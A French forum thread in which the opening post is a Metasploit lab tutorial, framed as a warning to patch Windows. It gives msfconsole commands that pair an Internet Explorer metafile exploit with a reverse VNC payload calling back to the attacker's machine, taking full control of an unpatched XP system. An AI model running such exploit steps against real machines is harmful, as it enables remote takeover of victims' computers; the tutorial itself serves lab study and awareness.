MetaSploit Tutorial : problémes de ...

22.09.2006, 15:33 Introduction

Certaines personnes ont développé des exploits pour permettre une machine "pirate" de se connecter sur une machine victime sous windows. Le but du tuto est de vous montrer un exemple d'utilisation sous windows XP service pack 1. Cà vous aidera à mieux comprendre les risques que vous courez en ne mettant pas à jour votre ordinateur.

Installation MetaSploit

Le tutorial se veut didactique, vous avez besoin de vmware player (voir tutorial sur le forum). Sous vmware player, créer une image windows XP (sans service pack), ainsi qu'une image linux (je vous conseille ubuntu).

Ensuite, télécharger MetaSploit version linux sur
http://www.metasploit.com/projects/Framework/downloads.html
Pour infos, il existe aussi une version windows, mais cygwin doit être installé sur votre ordinateur.

Mettre en place l'exploit

Sous votre image linux
Décompréssez metasploit
tar xvfz framework-2.6-snapshot.tar.gz

Ensuite, lancer ./msfconsole

Taper les commandes suivantes
Citationuse ie_xp_pfv_metafile
set PAYLOAD win32_reverse_vncinject
set LHOST <iplinux>
exploit

Remplacer iplinux par l'ip de votre image vmware linux

Le serveur se met en état d'attente d'une connexion.

Faire tomber le windows dans le piége

Lancer internet explorer

Charger l'adresse http://iplinux :8 080

Une petite fenêtre bleu va charger sous votre windows

Vous pouvez voir sur le screenshot suivant, le VNC qui est lancé et sur la droite la console de MetaSploit.
vulnerabilite windows

vulnerabilite windows

vulnerabilite windows

metasploit

metasploit

metasploit



Ensuite, sous votre linux, vous devriez voir un VNC charger avec l'écran windows de votre "victime". Vous avez alors un contrôle total sur elle.

Tout çà pour vous dire au final, de bien installer les mises à jour de windows et en particulier le service pack 2.

Télécharger service pack 2</iplinux>
mumuri cinemona.com
mumuri
mumuri
Messages : 14 367
22.09.2006, 19:42 Info et tuto intéressants :) Merci!

Un peu plus d'infos sur Metasploit : ici

daria
daria
daria
Messages : 66
23.09.2006, 15:53 tu avais déja testé ? mumuri cinemona.com
mumuri
mumuri
Messages : 14 367
23.09.2006, 20:57 Non j'ai pas (encore) testé mais c'est intéressant à savoir et ...peut-être à tester ! daria
daria
daria
Messages : 66

  • allo ciné
  • astuces de jeux vidéos
  • forum
  • livres bds roman
  • dessin animé
  • anime
  • smileys
  • avis livres
  • séries télé
  • avis films & streaming
  • actualité de jeux vidéos
  • bourse
Tous droits réservés © 2002-2009 . Top flood. Crédits des logiciels tiers     .